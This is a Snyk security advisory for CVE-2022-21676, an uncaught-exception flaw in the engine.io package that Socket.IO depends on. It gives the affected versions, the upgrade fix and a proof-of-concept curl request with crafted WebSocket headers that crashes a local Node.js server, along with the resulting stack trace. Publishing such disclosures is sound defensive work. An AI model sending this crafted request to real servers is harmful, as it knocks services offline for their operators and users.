Uncaught Exception Affecting engine.io package, versions >=4.0.0 <4.1.2 >=5.0.0 <5.2.1 >=6.0.0 <6.1.1
Snyk CVSS
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-ENGINEIO-2336356
- published 12 Jan 2022
- disclosed 12 Jan 2022
- credit Marcus Wejderot
Introduced: 12 Jan 2022
CVE-2022-21676 Open this link in a new tabHow to fix?
Upgrade engine.io
to version 4.1.2, 5.2.1, 6.1.1 or higher.
Overview
engine.io is a realtime engine behind Socket.IO. It provides the foundation of a bidirectional connection between client and server
Affected versions of this package are vulnerable to Uncaught Exception by sending a specially crafted HTTP request, that triggers an uncaught exception and kills the Node.js
process that runs an Engine.IO or a Socket.IO server.
PoC:
With an Engine.IO server running on port 3000:
curl
-X 'GET'
-H $'Connection: Upgrade'
-H $'Upgrade: websocket'
-H $'Sec-WebSocket-Version: 13'
-H $'Sec-WebSocket-Key: DXR4dX615eRds8nRmlhqtw=='
-H $'Content-Type: application/x-www-form-urlencoded'
-H $'Content-Length: 27'
--data-binary 'app=cae417iahm&_method=POST'
'http://localhost:3000/engine.io/?EIO=4&transport=websocket'
//Output:
node:events:368
throw er; // Unhandled 'error' event
^
RangeError: Invalid WebSocket frame: RSV2 and RSV3 must be clear
at Receiver.getInfo (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:176:14)
at Receiver.startLoop (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:136:22)
at Receiver._write (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:83:10)
at writeOrBuffer (node:internal/streams/writable:389:12)
at _write (node:internal/streams/writable:330:10)
at Receiver.Writable.write (node:internal/streams/writable:334:10)
at Socket.socketOnData (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/websocket.js:1116:35)
at Socket.emit (node:events:390:28)
at Socket.Readable.read (node:internal/streams/readable:527:10)
at Socket.read (node:net:644:39)